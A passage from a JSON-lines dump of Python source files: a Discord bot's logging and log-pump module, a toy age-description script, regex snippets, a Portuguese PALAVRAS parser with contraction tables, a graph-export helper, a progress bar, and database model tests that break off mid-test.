'permission_override_added_role_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'role_created_by': log_type('ROLE_CHANGES', 'CREATE'),\n 'role_created': log_type('ROLE_CHANGES', 'CREATE'),\n 'role_deleted': log_type('ROLE_CHANGES', 'DELETE'),\n 'role_update_perm_added': log_type('ROLE_CHANGES', 'ALTER'),\n 'role_update_perm_added_by': log_type('ROLE_CHANGES', 'DELETE'),\n 'role_update_perm_revoked': log_type('ROLE_CHANGES', 'DELETE'),\n 'role_update_perm_revoked_by': log_type('ROLE_CHANGES', 'DELETE'),\n 'manual_ban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'join_logging': log_type('JOIN_LOGS', 'JOIN'),\n 'join_logging_new': log_type('JOIN_LOGS', 'JOIN'),\n 'leave_logging': log_type('JOIN_LOGS', 'LEAVE'),\n 'manual_unban_log': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'own_nickname_changed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'unknown_nickname_changed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'mod_nickname_changed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'unknown_nickname_added': log_type('NAME_CHANGES', 'NICKTAG'),\n 'own_nickname_added': log_type('NAME_CHANGES', 'NICKTAG'),\n 'mod_nickname_added': log_type('NAME_CHANGES', 'NICKTAG'),\n 'own_nickname_removed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'mod_nickname_removed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'role_removed_by': log_type('ROLE_CHANGES', 'ROLE_REMOVE'),\n 'role_added_by': log_type('ROLE_CHANGES', 'ROLE_ADD'),\n 'role_removed': log_type('ROLE_CHANGES', 'ROLE_REMOVE'),\n 'role_added': log_type('ROLE_CHANGES', 'ROLE_ADD'),\n 'message_removed': log_type('EDIT_LOGS', 'TRASH'),\n 'edit_logging': log_type('EDIT_LOGS', 'EDIT'),\n 'username_changed': log_type('NAME_CHANGES', 'NAMETAG'),\n 'voice_change_deaf_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_deaf_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_mute_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_mute_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_mute_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_mute_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_deaf_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_deaf_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_afk_true': 
log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_afk_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'connected_to_voice': log_type('VOICE_CHANGES', 'VOICE'),\n 'disconnected_voice': log_type('VOICE_CHANGES', 'VOICE'),\n 'moved_voice': log_type('VOICE_CHANGES', 'VOICE'),\n 'purged_log': log_type('EDIT_LOGS', 'DELETE'),\n 'raid_mute_failed_no_role': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_message_failed': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_notification_failed': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_notification_forbidden': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_shield_triggered': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_shield_terminated': log_type('RAID_LOGS', 'INNOCENT'),\n 'unknown_nickname_removed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'message_pinned': log_type('EDIT_LOGS', 'PIN'),\n 'message_pinned_by': log_type('EDIT_LOGS', 'PIN'),\n 'message_unpinned': log_type('EDIT_LOGS', 'PIN'),\n 'raid_message_failed_missing_channel': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_failed_channel': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_failed_channel_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_user_not_found': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_user_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_mute_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_mute_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'raid_kick_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_kick_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'raid_ban_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_ban_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'shield_time_limit_reached': log_type('RAID_LOGS', 'WARNING'),\n 'slowmode_log': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'spam_violate': log_type('SPAM_VIOLATION', 'BAD_USER'),\n \"config_change\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_change_role_removed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_change_role_added\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_role_disabled\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_role_changed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_role_set\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_setup_triggered\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_setup_complete\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_setup_failed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_cleanup_triggered\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_cleanup_complete\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_cleanup_failed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_dash_security_change\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"verification_log\": log_type('MOD_ACTIONS', 'WRENCH')\n\n\n\n\n}\n\ndef before_send(event, hint):\n if event['level'] == \"error\" and 'logger' in event.keys() and event['logger'] == 'gearbot':\n return None # we send errors manually, in a much cleaner way\n if 'exc_info' in hint:\n exc_type, exc_value, tb = hint['exc_info']\n for t in [ConnectionClosed, ClientOSError, ServerDisconnectedError]:\n if isinstance(exc_value, t):\n return\n event['fingerprint'] = ['database-unavailable']\n return event\n\n\ndef init_logger():\n # track commits to make sentry versions\n dsn = Configuration.get_master_var('SENTRY_DSN', '')\n if dsn != '':\n sentry_sdk.init(dsn, before_send=before_send)\n\n LOGGER.setLevel(logging.DEBUG)\n\n DISCORD_LOGGER.setLevel(logging.DEBUG)\n\n formatter = 
logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s')\n\n handler = logging.StreamHandler(stream=sys.stdout)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n LOGGER.addHandler(handler)\n DISCORD_LOGGER.addHandler(handler)\n\n if not os.path.isdir(\"logs\"):\n os.mkdir(\"logs\")\n handler = TimedRotatingFileHandler(filename='logs/gearbot.log', encoding='utf-8', when=\"midnight\", backupCount=30)\n handler.setFormatter(formatter)\n handler.setLevel(logging.INFO)\n DISCORD_LOGGER.addHandler(handler)\n LOGGER.addHandler(handler)\n\n # handler = TimedRotatingFileHandler(filename='logs/discord.log', encoding='utf-8', when=\"h\", interval=1, backupCount=24)\n\n # DISCORD_LOGGER.addHandler(handler)\n\n\nasync def initialize(bot: commands.Bot, channelID):\n global BOT_LOG_CHANNEL, BOT, STARTUP_ERRORS, LOG_PUMP\n BOT = bot\n BOT_LOG_CHANNEL = bot.get_channel(int(channelID))\n if BOT_LOG_CHANNEL is None:\n LOGGER.error(\n \"==========================Logging channel is misconfigured, aborting startup!==========================\")\n await bot.logout()\n\n if len(STARTUP_ERRORS) > 0:\n await bot_log(\n f\":rotating_light: Caught {len(STARTUP_ERRORS)} {'exceptions' if len(STARTUP_ERRORS) > 1 else 'exception'} during startup.\")\n for e in STARTUP_ERRORS:\n await e\n STARTUP_ERRORS = []\n\n\ndef initialize_pump(bot):\n global LOG_PUMP\n LOG_PUMP = LogPump(bot)\n bot.loop.create_task(LOG_PUMP.pump())\n\n\ndef debug(message):\n LOGGER.debug(message)\n\n\ndef info(message):\n LOGGER.info(message)\n\n\ndef warn(message):\n LOGGER.warning(message)\n\n\ndef error(message):\n LOGGER.error(message)\n\n\ndef exception(message, error):\n LOGGER.error(message)\n trace = \"\"\n LOGGER.error(str(error))\n for line in traceback.format_tb(error.__traceback__):\n trace = f\"{trace}\\n{line}\"\n LOGGER.error(trace)\n\n\nasync def bot_log(message=None, embed=None):\n global BOT_LOG_CHANNEL, STARTUP_ERRORS\n if BOT_LOG_CHANNEL is not None:\n return await BOT_LOG_CHANNEL.send(content=message, embed=embed)\n else:\n STARTUP_ERRORS.append(bot_log(message, embed))\n\n\ndef log_raw(guild_id, location, message=None, embed=None, file=None):\n if isinstance(embed, int):\n raise ValueError(\"WTH IS SPAMMING MY LOGS?\")\n channels = Configuration.get_var(guild_id, \"LOG_CHANNELS\")\n if message is None and embed is None and file is None:\n raise ValueError(\"What the heck is trying to log nothing?\")\n if message is not None:\n message = Utils.trim_message(message, 1998)\n for cid, info in channels.items():\n if location in info:\n LOG_PUMP.receive(cid, (message, embed, file))\n\n\ndef log_to(guild_id, key, embed=None, file=None, can_stamp=True, tag_on=None, **kwargs):\n if isinstance(embed, int):\n raise ValueError(\"WTH IS SPAMMING MY LOGS?\")\n info = LOG_TYPES[key]\n remaining = None\n if key is None and embed is None and file is None:\n raise ValueError(\"What the heck is trying to log nothing?\")\n stamp = f\"[``{datetime.strftime(datetime.now().astimezone(pytz.timezone(Configuration.get_var(guild_id, 'GENERAL', 'TIMEZONE'))), '%H:%M:%S')}``] \" if can_stamp and Configuration.get_var(guild_id, 'GENERAL', \"TIMESTAMPS\") else \"\"\n m = MessageUtils.assemble(guild_id, info.emoji, key, **kwargs).replace('@', '@\\u200b')\n message = f\"{stamp}{Utils.trim_message(m, 1984)}\".replace(\"None\", \"\", 1)\n if tag_on is not None:\n tag_on = tag_on.replace('@', '@\\u200b')\n if message is None:\n message = tag_on\n else:\n if len(message) + len(tag_on) <= 1998:\n message = f\"{message} {tag_on}\"\n 
else:\n remaining = tag_on\n if message is not None:\n message = Utils.trim_message(message, 1998)\n channels = Configuration.get_var(guild_id, \"LOG_CHANNELS\")\n\n for cid, logging_keys in channels.items():\n if info.category in logging_keys:\n f = None\n if file is not None:\n buffer = file[0]\n name = file[1]\n buffer.seek(0)\n b2 = io.BytesIO()\n for line in buffer.readlines():\n b2.write(line)\n b2.seek(0)\n f = discord.File(b2, name)\n if remaining is None:\n LOG_PUMP.receive(cid, (message, embed, f))\n else:\n LOG_PUMP.receive(cid, (message, None, None))\n LOG_PUMP.receive(cid, (tag_on, embed, f))\n\n\nasync def message_owner(bot, message):\n if bot.owner_id is None:\n app = await bot.application_info()\n bot.owner_id = app.owner.id\n owner = bot.get_user(bot.owner_id)\n await owner.send(message)\n\n\nclass LogPump:\n\n def __init__(self, bot):\n self.todo = dict()\n self.running = True\n self.bot = bot\n self.NUKED = False\n info(\"Starting log pump\")\n\n async def pump(self):\n info(\"Log pump engaged\")\n empty = []\n embed = file = cid = todo = to_send = None\n while (self.running or len(self.todo) > 0) and not self.NUKED:\n try:\n empty = []\n senders = []\n embed = file = None\n for cid, todo in self.todo.items():\n channel = BOT.get_channel(int(cid))\n if channel is not None and len(todo) > 0:\n permissions = channel.permissions_for(channel.guild.me)\n to_send = \"\"\n while len(todo) > 0:\n message, embed, file = todo[0]\n if message is None or message.strip() == \"\":\n message = \"\"\n if (not permissions.send_messages) or (\n embed is not None and not permissions.embed_links) or (\n file is not None and not permissions.attach_files):\n todo.pop(0)\n continue\n elif len(to_send) + len(message) <= 1999:\n to_send += f\"{message}\\n\"\n todo.pop(0)\n else:\n break\n if embed is not None or file is not None:\n break\n try:\n senders.append(channel.send(to_send if to_send != \"\" else None, embed=embed, file=file))\n except CancelledError:\n return\n except Exception as e:\n await TheRealGearBot.handle_exception(\"LOG PUMP\", BOT, e,\n cid=cid, todo=todo, to_send=to_send,\n LOG_CACHE=self.todo, embed=embed,\n file=file, empty=empty)\n else:\n empty.append(cid)\n for e in empty:\n del self.todo[e]\n for s in senders:\n try:\n await s\n except discord.Forbidden:\n pass\n except CancelledError:\n return\n except Exception as e:\n await log_error()\n await TheRealGearBot.handle_exception(\"LOG PUMP\", BOT, e,\n cid=cid, todo=todo, to_send=to_send,\n LOG_CACHE=self.todo, embed=embed, file=file,\n empty=empty)\n await asyncio.sleep(0.1)\n except CancelledError:\n return # we're shutting down\n except Exception as e:\n await log_error()\n await TheRealGearBot.handle_exception(\"LOG PUMP\", BOT, e,\n cid=cid, todo=todo, to_send=to_send,\n LOG_CACHE=self.todo, embed=embed, file=file,\n empty=empty)\n info(\"Log pump terminated\")\n\n def receive(self, cid, data):\n if cid not in self.todo:\n self.todo[cid] = []\n self.todo[cid].append(data)\n\n\nasync def log_error():\n global LOG_ERRORS, LOG_PUMP\n LOG_ERRORS += 1\n if LOG_ERRORS >= 10:\n LOG_ERRORS = 0\n error(\"=========Log pump error limit reached, deploying nuke to unclog the system=========\")\n LOG_PUMP.NUKED = True\n initialize_pump(BOT)\n await bot_log(\"Log pump got clogged, nuked and restarted, moving on\")\n","sub_path":"GearBot/Util/GearbotLogging.py","file_name":"GearbotLogging.py","file_ext":"py","file_size_in_byte":19169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
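The GearbotLogging record above queues log lines per channel and has LogPump.pump() flush them in batches that must stay under Discord's message length limit. As an illustrative aside (not part of the dataset, and using hypothetical names), a minimal sketch of that batching idea is:

# Sketch of the line-batching idea used by LogPump.pump() in the record above.
# `pack_messages` and MAX_LEN are hypothetical names introduced for illustration;
# the length check mirrors the record's `len(to_send) + len(message) <= 1999` test.
from typing import Iterable, List

MAX_LEN = 1999

def pack_messages(lines: Iterable[str], max_len: int = MAX_LEN) -> List[str]:
    """Group log lines into message bodies no longer than roughly max_len characters."""
    batches: List[str] = []
    current = ""
    for line in lines:
        line = (line or "").strip()
        if not line:
            continue  # skip empty entries, as the pump skips blank messages
        if len(current) + len(line) <= max_len:
            current = f"{current}{line}\n"
        else:
            batches.append(current)
            current = f"{line}\n"
    if current:
        batches.append(current)
    return batches

# Example: two short lines share one message, an oversized line starts a new one.
print(pack_messages(["first entry", "second entry", "x" * 1990]))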
+{"seq_id":"98361594","text":"#startup for AGE GENERATOR: Version 2.0\r\n\r\nimport time as wait\r\nversion_major = '2'\r\nversion_minor = '0'\r\n\r\nprint(\"WELCOME TO:\")\r\nwait.sleep(0.4)\r\n\r\nprint(f\"Age Generator: Version {version_major}.{version_minor}\")\r\nwait.sleep(2)\r\n\r\n#cancel option added 9-27-21 / removed 4-13-22\r\n\r\n# old cancel code at: https://spaceplace.live/agegencancelcode.txt\r\n\r\nprint(\"Loading..\")\r\nwait.sleep(1.5)\r\n\r\n#finding age\r\n\r\nisCorrectInput = False\r\n\r\nwhile isCorrectInput == False:\r\n\r\n val = input(\"Input age: \") \r\n\r\n age = int(val)\r\n\r\n if age < 10:\r\n print(\"Age is too low!\")\r\n wait.sleep(0.8)\r\n if age > 101:\r\n print(\"Age is too high!\")\r\n wait.sleep(0.8)\r\n\r\n if age >= 10:\r\n isCorrectInput = True\r\n\r\n\r\n#started new age description chart 9-27-21 \"IM ON THE FLOOR LAUGHING\"\r\n\r\nprint(\"Loading in Magic...\")\r\nwait.sleep(1)\r\n\r\n#added new code interpretor 4-13-22:\r\n\r\nif age >= 10:\r\n if age < 20:\r\n print(\"Age 10 - 19: Young, looking strong! (But geez, these growing pains suck)!\")\r\nif age >= 20:\r\n if age < 30:\r\n print(\"Age 20 - 29: Getting older; growing less and less by the day...\")\r\nif age >= 30:\r\n if age < 30:\r\n print(\"Age 30 - 39: You have stopped growing altogether. Now the only part of your body that is still developing is your mind.\")\r\nif age >= 40:\r\n if age < 50:\r\n print(\"Age 40 - 49: If you weren't before, now your hair is going white, and you may even start to shrink! AAARGH!\")\r\nif age >= 50:\r\n if age < 60:\r\n print(\"Age 50 - 59: Alright, now you KNOW you're getting old, because you can't remember what happened when you were 22!\")\r\nif age >= 60:\r\n if age < 70:\r\n print(\"Age 60 - 69: You shrink, your skin is wrinkily, and you may have already gon full silver with your hair! These are all signs of getting old!\")\r\nif age >= 70:\r\n if age < 80:\r\n print(\"Age 70 - 79: Your skin has become so precious that you need many creams, just to keep it nice and smooth. Your speed is slower, but the wise old mind is still there!\")\r\nif age >= 80:\r\n if age < 90:\r\n print(\"Age 80 - 89: Remember the good old days, when your body was like elastic? Sure you do! You'd love to have that feeling. Plus, you dont even know how to use these NEW-FANGELED-YOUNG-PEOPLE-GADGETS!\")\r\n wait.sleep(1)\r\n print(\"(Also, why need to take away my driver's liscense!?!?!?!?!?!)\")\r\nif age >= 90:\r\n if age <= 100:\r\n print(\"Age 90 - 100: Congrats to you for making it this far. Really, props to you.\")\r\n\r\nwait.sleep(4)\r\n\r\nprint(\"If you enjoyed, stay tuned, as cycoo4 will release a new update soon! You can DM him on Discord at cycoo4#4444. 
Plus, he posts videos here!: https://www.youtube.com/channel/UC59BSpVifRrk0KV2l963dag\")\r\n\r\nwait.sleep(1.5)\r\n\r\nprint(\"Ending session...\")\r\n\r\nwait.sleep(1)\r\n\r\nexit(0)","sub_path":"Age Generator V2/Python/Age_Generator_V2.py","file_name":"Age_Generator_V2.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300590516","text":"\nimport re\n\nequation = '-6-3x-8x'\nchar = re.findall('[x]|[-|+][x]|[-|+]\\d+[x]|[-|+]\\d+',equation)\nprint(char)\n\n\nchar_2 = re.findall('[-|+]\\d+[x]',equation)\nprint(char_2)\n \ntexto = \"551 889 302 105 012 817 894 206\"\n \npatron = \"[0-9]{2}[13579]\"\n \nx = re.findall(patron, texto) #Devuelve un vector con los substrings de las ocurrencias\n \nfor i in x:\n print(i)","sub_path":"Scripts/Math/equa.py","file_name":"equa.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487469679","text":"# -*- encoding:utf-8 -*-\n\nimport re\n\nCONTRACTIONS = {\n # Complementação de 'a'\n 'a': {\n # Contração com artigo definido\n 'a': 'à',\n 'as': 'às',\n 'aquele': 'àquele',\n 'aqueles': 'àqueles',\n 'aquela': 'àquela',\n 'aquelas': 'àquelas',\n 'aquilo': 'àquilo',\n\n # Combinação com advérbio',\n 'onde': 'aonde'},\n\n # Complementação \"de\"\n 'de': {\n 'o': 'do',\n 'os': 'dos',\n 'a': 'da',\n 'as': 'das',\n\n # Contração com pronome pessoal',\n 'ele': 'dele',\n 'eles': 'deles',\n 'ela': 'dela',\n 'elas': 'delas',\n\n # Contração com pronome demonstrativo',\n 'este': 'deste',\n 'estes': 'destes',\n 'esta': 'desta',\n 'estas': 'destas',\n 'esse': 'desse',\n 'esses': 'desses',\n 'essa': 'dessa',\n 'essas': 'dessas',\n 'aquele': 'daquele',\n 'aqueles': 'daqueles',\n 'aquela': 'daquela',\n 'aquelas': 'daquelas',\n 'isto': 'disto',\n 'isso': 'disso',\n 'aquilo': 'daquilo',\n\n # Contração com advérbio',\n 'aqui': 'daqui',\n 'aí': 'daí',\n 'ali': 'dali',\n 'acolá': 'dacolá',\n 'onde': 'donde',\n\n # Contração com pronome indefinido',\n 'outro': 'doutro',\n 'outros': 'doutros',\n 'outra': 'doutra',\n 'outras': 'doutras',\n 'outrem': 'doutrem'},\n\n # Preposição 'em'\n 'em': {\n # Contração com artigo definido',\n 'o': 'no',\n 'os': 'nos',\n 'a': 'na',\n 'as': 'nas',\n\n # Contração com artigo indefinido',\n 'um': 'num',\n 'uns': 'nuns',\n 'uma': 'numa',\n 'umas': 'numas',\n\n # Contração com pronome pessoal',\n 'ele': 'nele',\n 'eles': 'neles',\n 'ela': 'nela',\n 'elas': 'nelas',\n\n # Contração com pronome demonstrativo',\n 'o': 'no',\n 'os': 'nos',\n 'a': 'na',\n 'as': 'nas',\n 'esse': 'nesse',\n 'esses': 'nesses',\n 'essa': 'nessa',\n 'essas': 'nessas',\n 'este': 'neste',\n 'estes': 'nestes',\n 'esta': 'nesta',\n 'estas': 'nestas',\n 'aquele': 'naquele',\n 'aqueles': 'naqueles',\n 'aquela': 'naquela',\n 'aquelas': 'naquelas',\n 'isto': 'nisto',\n 'isso': 'nisso',\n 'aquilo': 'naquilo',\n\n # Contração com pronome indefinido',\n 'outro': 'noutro',\n 'outros': 'noutros',\n 'outra': 'noutra',\n 'outras': 'noutras',\n 'outrem': 'noutrem'},\n\n # Complemento de 'para'\n 'para': {\n # Contração com artigo definido ou pronome',\n 'os': 'pro',\n 'os': 'pros',\n 'a': 'pra',\n 'as': 'pras'},\n\n # Complementação \"por\"',\n 'por': {\n # Contração com artigo definido ou pronome',\n 'o': 'pelo',\n 'os': 'pelos',\n 'a': 'pela',\n 'as': 'pelas',\n\n # Entre preposições',\n 'entre': 'dentre'}\n}\n\n\ndef parse_list(file, terminals, expand=False, comp_contractions=False):\n '''\n 
Change the flat output format of PLAVRAS to a dictonary\n\n :param file -> file to be parsed\n :param sentence The sentence that will be processed\n :param expand If True, the entities identified by PALAVRAS are splitted\n For instance, Dilma=Rousseff is showed two words Dilma and Rousseff\n :param comp_contractions If True, the contractions from PALAVRAS are\n compressed, as de + o as showed as do\n '''\n\n # parsed_sentence = self.parse(sentence)\n # self.local_parser(sentence)\n regex = r'#(-?[0-9]+)->([0-9]+)'\n\n parsed_sentence = open(file, 'r').read()\n\n default = lambda x, y: x[0] if len(x) > 0 else y\n\n tokens = list()\n pointers = dict()\n\n flag = False\n\n if terminals[0].attributes['word'].value == 'Eu':\n flag = True\n tokens.append(('Eu', {\n 'lemma': 'eu',\n 'morpho': ['M/F', '1S', 'NOM'],\n 'POS': 'pron-pers',\n 'semantic': ['eu'],\n 'relation': '#-1->1'}))\n\n for line in parsed_sentence.split('\\n'):\n\n if len(line.strip()) > 0:\n\n relation = default(re.findall('#\\d+->\\d+', line), '')\n\n original_word = re.findall('[^\\t ]+', line)[0]\n original_word = [original_word]\n\n if expand and original_word[0] != '=':\n original_word = original_word[0].split('=')\n\n for word in original_word:\n if word.startswith('$'):\n word = word[1:]\n lemma = word\n morpho = ['punct']\n pos = 'punct'\n word = word.replace('=', ' ')\n semantic_info = ['']\n\n else:\n lemma = default(\n re.findall('(?<=\\[)[^\\]]+', line), word)\n\n # Morpho Syntactic information\n morpho = default(re.findall(\n '[^>\\[\\]]+@', line), '', ).strip().split()\n if len(morpho) > 0:\n morpho.pop(-1)\n\n # The word id is its position in sentence\n pos = default(re.findall('(?<=@)[^ ]+', line), '')\n\n semantic_info = re.findall('(?<=<)[^> ]+', line)\n\n if len(tokens) > 0:\n contraction = CONTRACTIONS.get(\n tokens[-1][0], {}).get(word, None)\n\n if not (contraction is None):\n tokens[-1][1]['lemma'] = contraction\n tokens[-1] = (contraction, tokens[-1][1])\n word = None\n\n try:\n if morpho[2] == '1S' and not flag:\n target = re.search(regex, relation).group(1)\n tokens.append(('eu', {\n 'lemma': 'eu',\n 'morpho': ['M/F', '1S', 'NOM'],\n 'POS': 'pron-pers',\n 'semantic': ['eu'],\n 'relation': '#-2->' + target}))\n except IndexError:\n pass\n flag = False\n if not (word is None):\n tokens.append((word, {\n 'lemma': lemma,\n 'morpho': morpho,\n 'POS': pos,\n 'semantic': semantic_info,\n 'relation': relation, }))\n\n index = relation.replace('#', '').split('->')[0]\n pointers[index] = len(tokens) - 1\n\n return tokens, pointers","sub_path":"palavras.py","file_name":"palavras.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"80311746","text":"from tools import timed\nimport codecs\n\nfrom graph import Node, Edge\nfrom mongo_dal import MongoDAL\n\nMAX_DEPTH = 3\n\nclass GraphWriter(object):\n def __init__(self, max_depth=MAX_DEPTH):\n self.max_depth = max_depth\n self.dal = MongoDAL()\n self.nodes_dict = self.dal.get_nodes_dictionary()\n self.titles_blacklist = ['List of ']\n\n @timed\n def generate_graph_files(self, topic):\n src_id = self.nodes_dict[topic]\n \n self.nodes_file = codecs.open('nodes.csv', 'w', encoding='UTF-8')\n self.edges_file = codecs.open('edges.csv', 'w', encoding='UTF-8')\n\n self.edges_file.write(\"Source,Target,Weight\\n\")\n self.nodes_file.write(\"Id, Label\\n\")\n\n self.recurse_write_node(topic)\n\n self.nodes_file.close()\n self.edges_file.close()\n\n def recurse_write_node(self, 
topic, depth=0):\n if depth >= self.max_depth:\n return\n\n node = self.dal.get_node(topic)\n self.nodes_file.write('%s, \"%s\"\\n' % (node['page_id'], node['title']))\n\n for link in node['links']:\n if not self.nodes_dict.has_key(link):\n continue\n if link in self.titles_blacklist:\n continue\n dest_id = self.nodes_dict[link]\n weight = self.get_edge_weight(node, link)\n edge = Edge(node['page_id'], dest_id, weight)\n self.edges_file.write(str(edge))\n\n self.recurse_write_node(link, depth+1)\n\n def get_edge_weight(self, node, link):\n # Count number of occurrences of link title in node body\n return 1 + node['content'].lower().count(link.lower())\n\n","sub_path":"graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"287511322","text":"def printProgressBar(iteration,total,prefix='',suffix='',decimals = 1, length = 100,fill='█'):\n '''\n @params:\n iter - R - current iteration\n total - R - total iterations\n prefix - O - prefix string\n suffix - O - suffix string\n decimals- O - positive number of dec in percent complete\n length - O - character length of bar\n fill - O - bar fill character\n '''\n \n percent = 0\n filledLength = 0\n try:\n percent = (\"{0:.\"+str(decimals) + \"f}\").format(100 * (iteration/float(total)))\n filledLength = int(length * iteration // total)\n except ZeroDivisionError:\n print()\n #return\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s'%(prefix,bar,percent,suffix), end = '\\r')\n\n if iteration == total:\n print()","sub_path":"displayutils.py","file_name":"displayutils.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"179866482","text":"import unittest\nfrom threading import Thread\nfrom time import sleep\n\nfrom bidon.db.access import ModelAccess, RollbackTransaction, Upsert, autocommit, transaction\nfrom bidon.db.model import ModelBase\n\nfrom tests import get_model_access\n\n\n__all__ = [\"DbAccessModelAccessTestCase\"]\n\n\nclass Person(ModelBase):\n table_name = \"people\"\n attrs = {\n \"first_name\": None,\n \"last_name\": None,\n \"age\": 0 }\n\n\nclass PersonThing(ModelBase):\n table_name = \"peoples_things\"\n primary_key_name = (\"person_id\", \"thing_id\")\n primary_key_is_auto = False\n attrs = {\n \"person_id\": None,\n \"thing_id\": None,\n \"quantity\": 0}\n\n\nclass Thing(ModelBase):\n table_name = \"things\"\n attrs = {\n \"name\": None,\n \"type\": None,\n \"other\": None }\n\n\nclass DbAccessModelAccessTestCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.mab = get_model_access()\n cls.mab.open()\n\n @classmethod\n def tearDownClass(cls):\n cls.mab.rollback()\n cls.mab.close()\n\n def test_find_model(self):\n p = self.mab.find_model(Person, dict(first_name=\"Yours\"))\n self.assertIsNotNone(p)\n self.assertIsInstance(p, Person)\n self.assertEqual(p.first_name, \"Yours\")\n\n def test_find_models(self):\n ps = list(self.mab.find_models(Person, \"last_name like 'T%'\"))\n self.assertEqual(len(ps), 2)\n self.assertIsInstance(ps[0], Person)\n self.assertEqual(ps[0].last_name[0], \"T\")\n\n def test_page_models(self):\n ps, count = self.mab.page_models(Person, (0, 4), order_by=\"id\")\n self.assertEqual(count, 11)\n self.assertEqual(len(ps), 4)\n self.assertEqual([1, 2, 3, 4], [p.id for p in ps])\n\n def test_find_model_by_id(self):\n pt = 
self.mab.find_model_by_id(PersonThing, [1, 1])\n self.assertEqual(pt.person_id, 1)\n self.assertEqual(pt.thing_id, 1)\n self.assertEqual(pt.quantity, 1)\n p = self.mab.find_model_by_id(Person, 1)\n\n def test_refresh_model(self):\n with get_model_access() as mab:\n pt = mab.find_model(Person, \"1=1\")\n nn = \"aabbccdd\"\n mab.update(Person.table_name, dict(first_name=nn), dict(id=pt.id))\n self.assertNotEqual(pt.first_name, nn)\n self.assertEqual(mab.refresh_model(pt, overwrite=False).first_name, nn)\n self.assertNotEqual(pt.first_name, nn)\n mab.refresh_model(pt, overwrite=True)\n self.assertEqual(pt.first_name, nn)\n mab.rollback()\n\n def test_update_model(self):\n with get_model_access() as mab:\n p1 = mab.find_model_by_id(Person, 1)\n ua = p1.updated_at\n self.assertNotEqual(p1.first_name, \"Minerva\")\n updatedattrs = p1.update(dict(first_name=\"Minerva\", last_name=\"McGonagall\"))\n mab.update_model(p1, include_keys=updatedattrs)\n if mab.core.supports_returning_syntax:\n self.assertNotEqual(ua, p1.updated_at)\n p2 = mab.find_model_by_id(Person, 1)\n self.assertEqual(p2.first_name, \"Minerva\")\n self.assertEqual(p2.last_name, \"McGonagall\")\n mab.rollback()\n\n def test_insert_model(self):\n with get_model_access() as mab:\n p1 = Person(dict(first_name=\"Albus\", last_name=\"Dumbledore\", age=115))\n self.assertIsNone(p1.id)\n mab.insert_model(p1)\n self.assertIsNotNone(p1.id)\n self.assertIsNotNone(p1.created_at)\n p2 = mab.find_model_by_id(Person, p1.id)\n self.assertEqual(p1.first_name, p2.first_name)\n 